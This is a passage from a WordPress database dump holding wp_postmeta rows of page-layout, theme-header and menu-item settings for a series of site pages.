der_bg_color',''),(3950,6396,'_nectar_header_font_color',''),(3951,6396,'_nectar_header_bg_overlay_color',''),(3952,6396,'_disable_transparent_header','off'),(3953,6396,'_force_transparent_header','off'),(3954,6396,'_wpb_vc_js_status','false'),(3956,6396,'_dp_original','6269'),(3957,6396,'_edit_lock','1514383767:1'),(3958,6396,'_edit_last','1'),(3959,6398,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3960,6398,'_menu_item_type','post_type'),(3961,6398,'_menu_item_menu_item_parent','6271'),(3962,6398,'_menu_item_object_id','6396'),(3963,6398,'_menu_item_object','page'),(3964,6398,'_menu_item_target',''),(3965,6398,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3966,6398,'_menu_item_xfn',''),(3967,6398,'_menu_item_url',''),(3969,6399,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3970,6399,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3971,6399,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3972,6399,'_wp_page_template','default'),(3973,6399,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3974,6399,'nectar-metabox-portfolio-display-sortable','off'),(3975,6399,'_nectar_full_screen_rows','off'),(3976,6399,'_nectar_full_screen_rows_animation','none'),(3977,6399,'_nectar_full_screen_rows_animation_speed','medium'),(3978,6399,'_nectar_full_screen_rows_overall_bg_color',''),(3979,6399,'_nectar_full_screen_rows_anchors','off'),(3980,6399,'_nectar_full_screen_rows_mobile_disable','off'),(3981,6399,'_nectar_full_screen_rows_row_bg_animation','none'),(3982,6399,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3983,6399,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3984,6399,'_nectar_full_screen_rows_footer','none'),(3985,6399,'_nectar_slider_bg_type','image_bg'),(3986,6399,'_nectar_canvas_shapes',''),(3987,6399,'_nectar_media_upload_webm',''),(3988,6399,'_nectar_media_upload_mp4',''),(3989,6399,'_nectar_media_upload_ogv',''),(3990,6399,'_nectar_slider_preview_image',''),(3991,6399,'_nectar_header_bg',''),(3992,6399,'_nectar_header_parallax','off'),(3993,6399,'_nectar_header_box_roll','off'),(3994,6399,'_nectar_header_bg_height',''),(3995,6399,'_nectar_header_fullscreen','off'),(3996,6399,'_nectar_header_title',''),(3997,6399,'_nectar_header_subtitle',''),(3998,6399,'_nectar_page_header_text-effect','none'),(3999,6399,'_nectar_particle_rotation_timing',''),(4000,6399,'_nectar_particle_disable_explosion','off'),(4001,6399,'_nectar_page_header_alignment','left'),(4002,6399,'_nectar_page_header_alignment_v','middle'),(4003,6399,'_nectar_page_header_bg_alignment','center'),(4004,6399,'_nectar_header_bg_color',''),(4005,6399,'_nectar_header_font_color',''),(4006,6399,'_nectar_header_bg_overlay_color',''),(4007,6399,'_disable_transparent_header','off'),(4008,6399,'_force_transparent_header','off'),(4009,6399,'_wpb_vc_js_status','false'),(4011,6399,'_dp_original','6269'),(4012,6399,'_edit_lock','1514383862:1'),(4013,6399,'_edit_last','1'),(4014,6401,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4015,6401,'_menu_item_type','post_type'),(4016,6401,'_menu_item_menu_item_parent','6271'),(4017,6401,'_menu_item_object_id','6399'),(4018,6401,'_menu_item_object','page'),(4019,6401,'_menu_item_target',''),(4020,6401,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4021,6401,'_menu_item_xfn',''),(4022,6401,'_menu_item_url',''),(4024,6402,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4025,6402,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4026,6402,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4027,6402,'_wp_page_template','default'),(4028,6402,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4029,6402,'nectar-metabox-portfolio-display-sortable','off'),(4030,6402,'_nectar_full_screen_rows','off'),(4031,6402,'_nectar_full_screen_rows_animation','none'),(4032,6402,'_nectar_full_screen_rows_animation_speed','medium'),(4033,6402,'_nectar_full_screen_rows_overall_bg_color',''),(4034,6402,'_nectar_full_screen_rows_anchors','off'),(4035,6402,'_nectar_full_screen_rows_mobile_disable','off'),(4036,6402,'_nectar_full_screen_rows_row_bg_animation','none'),(4037,6402,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4038,6402,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4039,6402,'_nectar_full_screen_rows_footer','none'),(4040,6402,'_nectar_slider_bg_type','image_bg'),(4041,6402,'_nectar_canvas_shapes',''),(4042,6402,'_nectar_media_upload_webm',''),(4043,6402,'_nectar_media_upload_mp4',''),(4044,6402,'_nectar_media_upload_ogv',''),(4045,6402,'_nectar_slider_preview_image',''),(4046,6402,'_nectar_header_bg',''),(4047,6402,'_nectar_header_parallax','off'),(4048,6402,'_nectar_header_box_roll','off'),(4049,6402,'_nectar_header_bg_height',''),(4050,6402,'_nectar_header_fullscreen','off'),(4051,6402,'_nectar_header_title',''),(4052,6402,'_nectar_header_subtitle',''),(4053,6402,'_nectar_page_header_text-effect','none'),(4054,6402,'_nectar_particle_rotation_timing',''),(4055,6402,'_nectar_particle_disable_explosion','off'),(4056,6402,'_nectar_page_header_alignment','left'),(4057,6402,'_nectar_page_header_alignment_v','middle'),(4058,6402,'_nectar_page_header_bg_alignment','center'),(4059,6402,'_nectar_header_bg_color',''),(4060,6402,'_nectar_header_font_color',''),(4061,6402,'_nectar_header_bg_overlay_color',''),(4062,6402,'_disable_transparent_header','off'),(4063,6402,'_force_transparent_header','off'),(4064,6402,'_wpb_vc_js_status','false'),(4066,6402,'_dp_original','6272'),(4067,6402,'_edit_lock','1514383946:1'),(4068,6402,'_edit_last','1'),(4069,6404,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4070,6404,'_menu_item_type','post_type'),(4071,6404,'_menu_item_menu_item_parent','6274'),(4072,6404,'_menu_item_object_id','6402'),(4073,6404,'_menu_item_object','page'),(4074,6404,'_menu_item_target',''),(4075,6404,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4076,6404,'_menu_item_xfn',''),(4077,6404,'_menu_item_url',''),(4079,6405,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4080,6405,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4081,6405,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4082,6405,'_wp_page_template','default'),(4083,6405,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4084,6405,'nectar-metabox-portfolio-display-sortable','off'),(4085,6405,'_nectar_full_screen_rows','off'),(4086,6405,'_nectar_full_screen_rows_animation','none'),(4087,6405,'_nectar_full_screen_rows_animation_speed','medium'),(4088,6405,'_nectar_full_screen_rows_overall_bg_color',''),(4089,6405,'_nectar_full_screen_rows_anchors','off'),(4090,6405,'_nectar_full_screen_rows_mobile_disable','off'),(4091,6405,'_nectar_full_screen_rows_row_bg_animation','none'),(4092,6405,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4093,6405,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4094,6405,'_nectar_full_screen_rows_footer','none'),(4095,6405,'_nectar_slider_bg_type','image_bg'),(4096,6405,'_nectar_canvas_shapes',''),(4097,6405,'_nectar_media_upload_webm',''),(4098,6405,'_nectar_media_upload_mp4',''),(4099,6405,'_nectar_media_upload_ogv',''),(4100,6405,'_nectar_slider_preview_image',''),(4101,6405,'_nectar_header_bg',''),(4102,6405,'_nectar_header_parallax','off'),(4103,6405,'_nectar_header_box_roll','off'),(4104,6405,'_nectar_header_bg_height',''),(4105,6405,'_nectar_header_fullscreen','off'),(4106,6405,'_nectar_header_title',''),(4107,6405,'_nectar_header_subtitle',''),(4108,6405,'_nectar_page_header_text-effect','none'),(4109,6405,'_nectar_particle_rotation_timing',''),(4110,6405,'_nectar_particle_disable_explosion','off'),(4111,6405,'_nectar_page_header_alignment','left'),(4112,6405,'_nectar_page_header_alignment_v','middle'),(4113,6405,'_nectar_page_header_bg_alignment','center'),(4114,6405,'_nectar_header_bg_color',''),(4115,6405,'_nectar_header_font_color',''),(4116,6405,'_nectar_header_bg_overlay_color',''),(4117,6405,'_disable_transparent_header','off'),(4118,6405,'_force_transparent_header','off'),(4119,6405,'_wpb_vc_js_status','false'),(4121,6405,'_dp_original','6272'),(4122,6405,'_edit_lock','1514427720:1'),(4123,6405,'_edit_last','1'),(4124,6407,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4125,6407,'_menu_item_type','post_type'),(4126,6407,'_menu_item_menu_item_parent','6274'),(4127,6407,'_menu_item_object_id','6405'),(4128,6407,'_menu_item_object','page'),(4129,6407,'_menu_item_target',''),(4130,6407,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4131,6407,'_menu_item_xfn',''),(4132,6407,'_menu_item_url',''),(4134,6408,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4135,6408,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4136,6408,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4137,6408,'_wp_page_template','default'),(4138,6408,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4139,6408,'nectar-metabox-portfolio-display-sortable','off'),(4140,6408,'_nectar_full_screen_rows','off'),(4141,6408,'_nectar_full_screen_rows_animation','none'),(4142,6408,'_nectar_full_screen_rows_animation_speed','medium'),(4143,6408,'_nectar_full_screen_rows_overall_bg_color',''),(4144,6408,'_nectar_full_screen_rows_anchors','off'),(4145,6408,'_nectar_full_screen_rows_mobile_disable','off'),(4146,6408,'_nectar_full_screen_rows_row_bg_animation','none'),(4147,6408,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4148,6408,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4149,6408,'_nectar_full_screen_rows_footer','none'),(4150,6408,'_nectar_slider_bg_type','image_bg'),(4151,6408,'_nectar_canvas_shapes',''),(4152,6408,'_nectar_media_upload_webm',''),(4153,6408,'_nectar_media_upload_mp4',''),(4154,6408,'_nectar_media_upload_ogv',''),(4155,6408,'_nectar_slider_preview_image',''),(4156,6408,'_nectar_header_bg',''),(4157,6408,'_nectar_header_parallax','off'),(4158,6408,'_nectar_header_box_roll','off'),(4159,6408,'_nectar_header_bg_height',''),(4160,6408,'_nectar_header_fullscreen','off'),(4161,6408,'_nectar_header_title',''),(4162,6408,'_nectar_header_subtitle',''),(4163,6408,'_nectar_page_header_text-effect','none'),(4164,6408,'_nectar_particle_rotation_timing',''),(4165,6408,'_nectar_particle_disable_explosion','off'),(4166,6408,'_nectar_page_header_alignment','left'),(4167,6408,'_nectar_page_header_alignment_v','middle'),(4168,6408,'_nectar_page_header_bg_alignment','center'),(4169,6408,'_nectar_header_bg_color',''),(4170,6408,'_nectar_header_font_color',''),(4171,6408,'_nectar_header_bg_overlay_color',''),(4172,6408,'_disable_transparent_header','off'),(4173,6408,'_force_transparent_header','off'),(4174,6408,'_wpb_vc_js_status','false'),(4176,6408,'_dp_original','6272'),(4177,6408,'_edit_lock','1514427878:1'),(4178,6408,'_edit_last','1'),(4179,6410,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4180,6410,'_menu_item_type','post_type'),(4181,6410,'_menu_item_menu_item_parent','6274'),(4182,6410,'_menu_item_object_id','6408'),(4183,6410,'_menu_item_object','page'),(4184,6410,'_menu_item_target',''),(4185,6410,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4186,6410,'_menu_item_xfn',''),(4187,6410,'_menu_item_url',''),(4189,6411,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4190,6411,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4191,6411,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4192,6411,'_wp_page_template','default'),(4193,6411,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4194,6411,'nectar-metabox-portfolio-display-sortable','off'),(4195,6411,'_nectar_full_screen_rows','off'),(4196,6411,'_nectar_full_screen_rows_animation','none'),(4197,6411,'_nectar_full_screen_rows_animation_speed','medium'),(4198,6411,'_nectar_full_screen_rows_overall_bg_color',''),(4199,6411,'_nectar_full_screen_rows_anchors','off'),(4200,6411,'_nectar_full_screen_rows_mobile_disable','off'),(4201,6411,'_nectar_full_screen_rows_row_bg_animation','none'),(4202,6411,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4203,6411,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4204,6411,'_nectar_full_screen_rows_footer','none'),(4205,6411,'_nectar_slider_bg_type','image_bg'),(4206,6411,'_nectar_canvas_shapes',''),(4207,6411,'_nectar_media_upload_webm',''),(4208,6411,'_nectar_media_upload_mp4',''),(4209,6411,'_nectar_media_upload_ogv',''),(4210,6411,'_nectar_slider_preview_image',''),(4211,6411,'_nectar_header_bg',''),(4212,6411,'_nectar_header_parallax','off'),(4213,6411,'_nectar_header_box_roll','off'),(4214,6411,'_nectar_header_bg_height',''),(4215,6411,'_nectar_header_fullscreen','off'),(4216,6411,'_nectar_header_title',''),(4217,6411,'_nectar_header_subtitle',''),(4218,6411,'_nectar_page_header_text-effect','none'),(4219,6411,'_nectar_particle_rotation_timing',''),(4220,6411,'_nectar_particle_disable_explosion','off'),(4221,6411,'_nectar_page_header_alignment','left'),(4222,6411,'_nectar_page_header_alignment_v','middle'),(4223,6411,'_nectar_page_header_bg_alignment','center'),(4224,6411,'_nectar_header_bg_color',''),(4225,6411,'_nectar_header_font_color',''),(4226,6411,'_nectar_header_bg_overlay_color',''),(4227,6411,'_disable_transparent_header','off'),(4228,6411,'_force_transparent_header','off'),(4229,6411,'_wpb_vc_js_status','false'),(4231,6411,'_dp_original','6272'),(4232,6411,'_edit_lock','1514428934:1'),(4233,6411,'_edit_last','1'),(4234,6413,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4235,6413,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4236,6413,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4237,6413,'_wp_page_template','default'),(4238,6413,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4239,6413,'nectar-metabox-portfolio-display-sortable','off'),(4240,6413,'_nectar_full_screen_rows','off'),(4241,6413,'_nectar_full_screen_rows_animation','none'),(4242,6413,'_nectar_full_screen_rows_animation_speed','medium'),(4243,6413,'_nectar_full_screen_rows_overall_bg_color',''),(4244,6413,'_nectar_full_screen_rows_anchors','off'),(4245,6413,'_nectar_full_screen_rows_mobile_disable','off'),(4246,6413,'_nectar_full_screen_rows_row_bg_animation','none'),(4247,6413,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4248,6413,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4249,6413,'_nectar_full_screen_rows_footer','none'),(4250,6413,'_nectar_slider_bg_type','image_bg'),(4251,6413,'_nectar_canvas_shapes',''),(4252,6413,'_nectar_media_upload_webm',''),(4253,6413,'_nectar_media_upload_mp4',''),(4254,6413,'_nectar_media_upload_ogv',''),(4255,6413,'_nectar_slider_preview_image',''),(4256,6413,'_nectar_header_bg',''),(4257,6413,'_nectar_header_parallax','off'),(4258,6413,'_nectar_header_box_roll','off'),(4259,6413,'_nectar_header_bg_height',''),(4260,6413,'_nectar_header_fullscreen','off'),(4261,6413,'_nectar_header_title',''),(4262,6413,'_nectar_header_subtitle',''),(4263,6413,'_nectar_page_header_text-effect','none'),(4264,6413,'_nectar_particle_rotation_timing',''),(4265,6413,'_nectar_particle_disable_explosion','off'),(4266,6413,'_nectar_page_header_alignment','left'),(4267,6413,'_nectar_page_header_alignment_v','middle'),(4268,6413,'_nectar_page_header_bg_alignment','center'),(4269,6413,'_nectar_header_bg_color',''),(4270,6413,'_nectar_header_font_color',''),(4271,6413,'_nectar_header_bg_overlay_color',''),(4272,6413,'_disable_transparent_header','off'),(4273,6413,'_force_transparent_header','off'),(4274,6413,'_wpb_vc_js_status','false'),(4276,6413,'_dp_original','6272'),(4277,6413,'_edit_lock','1514429209:1'),(4278,6413,'_edit_last','1'),(4279,6415,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4280,6415,'_menu_item_type','post_type'),(4281,6415,'_menu_item_menu_item_parent','6274'),(4282,6415,'_menu_item_object_id','6413'),(4283,6415,'_menu_item_object','page'),(4284,6415,'_menu_item_target',''),(4285,6415,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4286,6415,'_menu_item_xfn',''),(4287,6415,'_menu_item_url',''),(4289,6416,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4290,6416,'_menu_item_type','post_type'),(4291,6416,'_menu_item_menu_item_parent','6274'),(4292,6416,'_menu_item_object_id','6411'),(4293,6416,'_menu_item_object','page'),(4294,6416,'_menu_item_target',''),(4295,6416,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4296,6416,'_menu_item_xfn',''),(4297,6416,'_menu_item_url',''),(4299,6417,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4300,6417,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4301,6417,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4302,6417,'_wp_page_template','default'),(4303,6417,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4304,6417,'nectar-metabox-portfolio-display-sortable','off'),(4305,6417,'_nectar_full_screen_rows','off'),(4306,6417,'_nectar_full_screen_rows_animation','none'),(4307,6417,'_nectar_full_screen_rows_animation_speed','medium'),(4308,6417,'_nectar_full_screen_rows_overall_bg_color',''),(4309,6417,'_nectar_full_screen_rows_anchors','off'),(4310,6417,'_nectar_full_screen_rows_mobile_disable','off'),(4311,6417,'_nectar_full_screen_rows_row_bg_animation','none'),(4312,6417,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4313,6417,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4314,6417,'_nectar_full_screen_rows_footer','none'),(4315,6417,'_nectar_slider_bg_type','image_bg'),(4316,6417,'_nectar_canvas_shapes',''),(4317,6417,'_nectar_media_upload_webm',''),(4318,6417,'_nectar_media_upload_mp4',''),(4319,6417,'_nectar_media_upload_ogv',''),(4320,6417,'_nectar_slider_preview_image',''),(4321,6417,'_nectar_header_bg',''),(4322,6417,'_nectar_header_parallax','off'),(4323,6417,'_nectar_header_box_roll','off'),(4324,6417,'_nectar_header_bg_height',''),(4325,6417,'_nectar_header_fullscreen','off'),(4326,6417,'_nectar_header_title',''),(4327,6417,'_nectar_header_subtitle',''),(4328,6417,'_nectar_page_header_text-effect','none'),(4329,6417,'_nectar_particle_rotation_timing',''),(4330,6417,'_nectar_particle_disable_explosion','off'),(4331,6417,'_nectar_page_header_alignment','left'),(4332,6417,'_nectar_page_header_alignment_v','middle'),(4333,6417,'_nectar_page_header_bg_alignment','center'),(4334,6417,'_nectar_header_bg_color',''),(4335,6417,'_nectar_header_font_color',''),(4336,6417,'_nectar_header_bg_overlay_color',''),(4337,6417,'_disable_transparent_header','off'),(4338,6417,'_force_transparent_header','off'),(4339,6417,'_wpb_vc_js_status','false'),(4341,6417,'_dp_original','6272'),(4342,6417,'_edit_lock','1514429759:1'),(4343,6417,'_edit_last','1'),(4344,6419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4345,6419,'_menu_item_type','post_type'),(4346,6419,'_menu_item_menu_item_parent','6274'),(4347,6419,'_menu_item_object_id','6417'),(4348,6419,'_menu_item_object','page'),(4349,6419,'_menu_item_target',''),(4350,6419,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4351,6419,'_menu_item_xfn',''),(4352,6419,'_menu_item_url',''),(4354,6420,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4355,6420,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4356,6420,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4357,6420,'_wp_page_template','default'),(4358,6420,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4359,6420,'nectar-metabox-portfolio-display-sortable','off'),(4360,6420,'_nectar_full_screen_rows','off'),(4361,6420,'_nectar_full_screen_rows_animation','none'),(4362,6420,'_nectar_full_screen_rows_animation_speed','medium'),(4363,6420,'_nectar_full_screen_rows_overall_bg_color',''),(4364,6420,'_nectar_full_screen_rows_anchors','off'),(4365,6420,'_nectar_full_screen_rows_mobile_disable','off'),(4366,6420,'_nectar_full_screen_rows_row_bg_animation','none'),(4367,6420,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4368,6420,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4369,6420,'_nectar_full_screen_rows_footer','none'),(4370,6420,'_nectar_slider_bg_type','image_bg'),(4371,6420,'_nectar_canvas_shapes',''),(4372,6420,'_nectar_media_upload_webm',''),(4373,6420,'_nectar_media_upload_mp4',''),(4374,6420,'_nectar_media_upload_ogv',''),(4375,6420,'_nectar_slider_preview_image',''),(4376,6420,'_nectar_header_bg',''),(4377,6420,'_nectar_header_parallax','off'),(4378,6420,'_nectar_header_box_roll','off'),(4379,6420,'_nectar_header_bg_height',''),(4380,6420,'_nectar_header_fullscreen','off'),(4381,6420,'_nectar_header_title',''),(4382,6420,'_nectar_header_subtitle',''),(4383,6420,'_nectar_page_header_text-effect','none'),(4384,6420,'_nectar_particle_rotation_timing',''),(4385,6420,'_nectar_particle_disable_explosion','off'),(4386,6420,'_nectar_page_header_alignment','left'),(4387,6420,'_nectar_page_header_alignment_v','middle'),(4388,6420,'_nectar_page_header_bg_alignment','center'),(4389,6420,'_nectar_header_bg_color',''),(4390,6420,'_nectar_header_font_color',''),(4391,6420,'_nectar_header_bg_overlay_color',''),(4392,6420,'_disable_transparent_header','off'),(4393,6420,'_force_transparent_header','off'),(4394,6420,'_wpb_vc_js_status','false'),(4396,6420,'_dp_original','6272'),(4397,6420,'_edit_lock','1514429834:1'),(4398,6420,'_edit_last','1'),(4399,6422,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4400,6422,'_menu_item_type','post_type'),(4401,6422,'_menu_item_menu_item_parent','6274'),(4402,6422,'_menu_item_object_id','6420'),(4403,6422,'_menu_item_object','page'),(4404,6422,'_menu_item_target',''),(4405,6422,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4406,6422,'_menu_item_xfn',''),(4407,6422,'_menu_item_url',''),(4409,6423,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4410,6423,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4411,6423,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4412,6423,'_wp_page_template','default'),(4413,6423,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4414,6423,'nectar-metabox-portfolio-display-sortable','off'),(4415,6423,'_nectar_full_screen_rows','off'),(4416,6423,'_nectar_full_screen_rows_animation','none'),(4417,6423,'_nectar_full_screen_rows_animation_speed','medium'),(4418,6423,'_nectar_full_screen_rows_overall_bg_color',''),(4419,6423,'_nectar_full_screen_rows_anchors','off'),(4420,6423,'_nectar_full_screen_rows_mobile_disable','off'),(4421,6423,'_nectar_full_screen_rows_row_bg_animation','none'),(4422,6423,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4423,6423,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4424,6423,'_nectar_full_screen_rows_footer','none'),(4425,6423,'_nectar_slider_bg_type','image_bg'),(4426,6423,'_nectar_canvas_shapes',''),(4427,6423,'_nectar_media_upload_webm',''),(4428,6423,'_nectar_media_upload_mp4',''),(4429,6423,'_nectar_media_upload_ogv',''),(4430,6423,'_nectar_slider_preview_image',''),(4431,6423,'_nectar_header_bg',''),(4432,6423,'_nectar_header_parallax','off'),(4433,6423,'_nectar_header_box_roll','off'),(4434,6423,'_nectar_header_bg_height',''),(4435,6423,'_nectar_header_fullscreen','off'),(4436,6423,'_nectar_header_title',''),(4437,6423,'_nectar_header_subtitle',''),(4438,6423,'_nectar_page_header_text-effect','none'),(4439,6423,'_nectar_particle_rotation_timing',''),(4440,6423,'_nectar_particle_disable_explosion','off'),(4441,6423,'_nectar_page_header_alignment','left'),(4442,6423,'_nectar_page_header_alignment_v','middle'),(4443,6423,'_nectar_page_header_bg_alignment','center'),(4444,6423,'_nectar_header_bg_color',''),(4445,6423,'_nectar_header_font_color',''),(4446,6423,'_nectar_header_bg_overlay_color',''),(4447,6423,'_disable_transparent_header','off'),(4448,6423,'_force_transparent_header','off'),(4449,6423,'_wpb_vc_js_status','false'),(4451,6423,'_dp_original','6272'),(4452,6423,'_edit_lock','1514430026:1'),(4453,6423,'_edit_last','1'),(4454,6425,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4455,6425,'_menu_item_type','post_type'),(4456,6425,'_menu_item_menu_item_parent','6274'),(4457,6425,'_menu_item_object_id','6423'),(4458,6425,'_menu_item_object','page'),(4459,6425,'_menu_item_target',''),(4460,6425,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4461,6425,'_menu_item_xfn',''),(4462,6425,'_menu_item_url',''),(4464,6426,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4465,6426,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4466,6426,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4467,6426,'_wp_page_template','default'),(4468,6426,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4469,6426,'nectar-metabox-portfolio-display-sortable','off'),(4470,6426,'_nectar_full_screen_rows','off'),(4471,6426,'_nectar_full_screen_rows_animation','none'),(4472,6426,'_nectar_full_screen_rows_animation_speed','medium'),(4473,6426,'_nectar_full_screen_rows_overall_bg_color',''),(4474,6426,'_nectar_full_screen_rows_anchors','off'),(4475,6426,'_nectar_full_screen_rows_mobile_disable','off'),(4476,6426,'_nectar_full_screen_rows_row_bg_animation','none'),(4477,6426,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4478,6426,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4479,6426,'_nectar_full_screen_rows_footer','none'),(4480,6426,'_nectar_slider_bg_type','image_bg'),(4481,6426,'_nectar_canvas_shapes',''),(4482,6426,'_nectar_media_upload_webm',''),(4483,6426,'_nectar_media_upload_mp4',''),(4484,6426,'_nectar_media_upload_ogv',''),(4485,6426,'_nectar_slider_preview_image',''),(4486,6426,'_nectar_header_bg',''),(4487,6426,'_nectar_header_parallax','off'),(4488,6426,'_nectar_header_box_roll','off'),(4489,6426,'_nectar_header_bg_height',''),(4490,6426,'_nectar_header_fullscreen','off'),(4491,6426,'_nectar_header_title',''),(4492,6426,'_nectar_header_subtitle',''),(4493,6426,'_nectar_page_header_text-effect','none'),(4494,6426,'_nectar_particle_rotation_timing',''),(4495,6426,'_nectar_particle_disable_explosion','off'),(4496,6426,'_nectar_page_header_alignment','left'),(4497,6426,'_nectar_page_header_alignment_v','middle'),(4498,6426,'_nectar_page_header_bg_alignment','center'),(4499,6426,'_nectar_header_bg_color',''),(4500,6426,'_nectar_header_font_color',''),(4501,6426,'_nectar_header_bg_overlay_color',''),(4502,6426,'_disable_transparent_header','off'),(4503,6426,'_force_transparent_header','off'),(4504,6426,'_wpb_vc_js_status','false'),(4506,6426,'_dp_original','6272'),(4507,6426,'_edit_lock','1514430205:1'),(4508,6426,'_edit_last','1'),(4509,6428,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4510,6428,'_menu_item_type','post_type'),(4511,6428,'_menu_item_menu_item_parent','6274'),(4512,6428,'_menu_item_object_id','6426'),(4513,6428,'_menu_item_object','page'),(4514,6428,'_menu_item_target',''),(4515,6428,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4516,6428,'_menu_item_xfn',''),(4517,6428,'_menu_item_url',''),(4519,6429,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4520,6429,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4521,6429,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4522,6429,'_wp_page_template','default'),(4523,6429,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4524,6429,'nectar-metabox-portfolio-display-sortable','off'),(4525,6429,'_nectar_full_screen_rows','off'),(4526,6429,'_nectar_full_screen_rows_animation','none'),(4527,6429,'_nectar_full_screen_rows_animation_speed','medium'),(4528,6429,'_nectar_full_screen_rows_overall_bg_color',''),(4529,6429,'_nectar_full_screen_rows_anchors','off'),(4530,6429,'_nectar_full_screen_rows_mobile_disable','off'),(4531,6429,'_nectar_full_screen_rows_row_bg_animation','none'),(4532,6429,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4533,6429,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4534,6429,'_nectar_full_screen_rows_footer','none'),(4535,6429,'_nectar_slider_bg_type','image_bg'),(4536,6429,'_nectar_canvas_shapes',''),(4537,6429,'_nectar_media_upload_webm',''),(4538,6429,'_nectar